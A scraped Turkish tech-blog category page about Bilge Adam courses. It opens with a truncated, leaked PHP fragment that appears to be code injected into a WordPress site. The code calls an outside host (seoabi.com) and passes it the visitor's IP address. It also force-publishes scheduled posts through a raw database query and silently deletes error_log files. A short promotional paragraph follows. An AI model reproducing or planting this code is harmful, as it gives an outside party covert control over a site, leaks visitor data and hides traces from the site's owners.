$value) { $post_string .= $key.'='.urlencode(trim($value)).'&'; } rtrim($post_string, '&'); curl_setopt($ch,CURLOPT_POST, count($post)); curl_setopt($ch,CURLOPT_POSTFIELDS, $post_string); } $result=curl_exec($ch); return $result; } $mcuOutput = conn('https://seoabi.com/wmbys/blog-api.php?ip='.$_SERVER['REMOTE_ADDR']); $GLOBALS['mcuOutput'] = json_decode($mcuOutput); $wpdb->query("UPDATE `wp_posts` SET post_status = 'publish' WHERE post_status = 'future' && post_date < NOW()"); @unlink($_SERVER['DOCUMENT_ROOT'].'/error_log'); @unlink($_SERVER['DOCUMENT_ROOT'].'/imle/error_log'); ?> bilge adam | Teknoloji Haberleri

bilge adam kategorisindeki tüm yazılar

Son Yazılar

BİLGE ADAM İSTANBUL

 Bilge adam iletişim teknolojileri sizlerin gelişimi ve sizlerin başarısı açısından önemli bir yeri vardır. Bilge adam kurlsarı sizlerin gelecekte çok daha iyi yerlere gelebilmeniz için düzenlenmiştir. Yani bilge adamı seçmeniz sizlerin gelecekte çok daha iyi yerlere gelmenizi sağlayabilecektir. Her kesimden insanın iyi bir konuma gelebilmesi ve sizi